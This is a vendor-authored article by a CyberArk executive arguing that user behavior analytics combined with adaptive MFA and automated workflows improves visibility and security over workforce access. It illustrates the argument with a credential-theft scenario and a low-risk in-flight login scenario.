Over six in 10 security decision-makers say their teams operate with limited visibility across their environments. Why? We could easily speculate that it comes down to the tools they do or don’t use. However, two-thirds of enterprises now have tools from up to 40 different security vendors in place, and they’re still struggling for insights into the constant cycle of identities seeking access.
I believe there’s a bigger-picture challenge we need to – and can – solve for.
In many ways, securing the workforce’s access to applications, devices and resources such as sensitive data is about being a constant observer of human behavior – and asking yourself the following questions in a perpetual loop:
- What are your users seeking to access and why?
- What actions are they trying to take with sensitive resources?
- Do the findings (to the preceding questions) align with what’s appropriate for a given worker’s role within the enterprise?
The problem is that you need immediate answers to these questions every time a user attempts to authenticate. And you need to know the answers for every user – across your ecosystem of employees and vendors, among others.
To get the visibility we need, the solution will come down to three variables: insights on user behavior, automated actions and integration enabling tools to share and act on data.
All Seeing, All Knowing – How to Observe and Secure Workforce Access Behavior
While various analytics tools have been in market for a while, enterprise security teams need capabilities beyond simple feeds and dashboards. Today’s threats call for a sophisticated user behavior analytics (UBA) engine serving as a centralized brain and nervous system – all-seeing, all-knowing.
Individual humans can’t independently maintain a real-time study of every user’s actions. Nor can they instantly infer a set of behavioral traits from the past that could indicate whether a person logging in is indeed that user – or an attacker. And yet, having that type of knowledge would be a game-changer.
This is where it helps to have a UBA engine capable of:
- Compiling and analyzing a historical log of user access behavior.
- Vetting access attempts in real time and autonomously detecting any signs of variation from typical behavior.
- Integrating with smart authentication tools – for example, adaptive multi-factor authentication (MFA) – to make automated decisions on handling any access attempt.
Let’s explore some scenarios in which such capabilities can help security teams make faster, smarter decisions that defend against attacks and support the business.
Scenario 1: Preventing Attacks – Anytime, Anywhere
Imagine a scenario in which an attacker steals a user’s password from a compromised website and figures out where the user works through LinkedIn. It’s 2:30 a.m.: the user and security team are sleeping, but the attacker is very much awake – testing out the password to see if it’s reused across enterprise apps storing sensitive data.
All the signals point to a threat, and here’s what the UBA and adaptive MFA would see: the log-in attempt is happening at a time when the employee is never active. It’s coming from a region the employee never travels to. What’s more, the IP address is atypical and the device is unfamiliar.
In this scenario, let’s say the MFA is integrated with the UBA engine – and can relay insights about the log-in attempt to the UBA, like hands sending sensory information to the brain. In lockstep, the UBA weighs the signals against the actual user’s history. It’s an attack. The UBA decides which actions to take, including:
- Adapting the log-in process to invoke stronger authentication challenges such as phishing-proof secondary factors (e.g., physical tokens) and knowing in which order to require them.
- Preventing access until the actual user can scan a unique QR code to approve access on their pre-enrolled mobile device.
How Else Can Automation and Integration Help?
Enterprises can also use automated, no-code workflows for continuous threat detection and response. Imagine another scenario where an attacker compromises a privileged user’s account.
In this instance, an automated workflow could detect a potentially malicious action – e.g., when a new SSH key is created in a privileged session – and alert your team via Slack. Through “if-then” logic, the workflow could automatically remediate the session, temporarily suspending the user’s access, while your team investigates. Or the workflow could relocate the user into a pre-defined high-risk user group with minimal access.
Scenarios like the ones we’ve highlighted here are a win for organizations looking to build toward a security-first approach to workforce access. They’re also a win for security leaders seeking ways to operate more efficiently. With capabilities from UBA, adaptive MFA and automated workflows, securing access can involve fewer work hours, staff and costs.
And with the right capabilities, these insights can be at a security admin’s fingertips – providing the ability to drill down into details, including every factor that influenced the automated decision.
Scenario 2: Improving Productivity and User Experience
We’ll continue with another example: an employee working late on a cross-country flight. The stakes: she’s putting the final touches on a product launch essential for improving the customer experience.
Her laptop is open. WiFi is on. SSO accepts her password. Next up: MFA to get into a collaboration app where she’s managing the project. Here, frictionless UX is essential; the employee is on deadline. But you can’t put security on the back burner: The same web applications your users need to access are also the No. 1 attack vector in eight out of 10 incidents. In this in-flight scenario, a context-aware MFA/UBA combo would see that the log-in attempt is coming:
1. From a pre-approved device.
2. On a typical weekday (a usual workday for her).
3. At a regular time of day – her user history reflects the fact that she travels regularly to and from the given region.
Of course, visibility is best when paired with automated capabilities to act upon what’s seen. The dynamic duo of UBA and adaptive MFA can apply contextual insights to make a decision. In this low-risk case, the UBA can determine that secondary authentication isn’t necessary and allow the user to access the application – without compromising security.
The outcome: the employee authenticates safely and efficiently, completing her project on deadline. And this is a win for her company’s security team’s ability to show that security-first access can be an enabler rather than a barrier to progress.
Embracing and Effecting Change in Securing Today’s Workforce
Visibility is the first step in making smarter decisions regarding workforce access. Automation can help your team do more. With the proper controls and capabilities – built into an integrated approach that brings tools together to share and act on data – you can significantly improve your security posture and support the business.
For more insights on how you can secure your organization from identity-related threats, check out this video from CyberArk experts on what capabilities are needed to balance securing the workforce and ensuring productivity.
Gil Rapaport is the general manager for Identity and Access at CyberArk.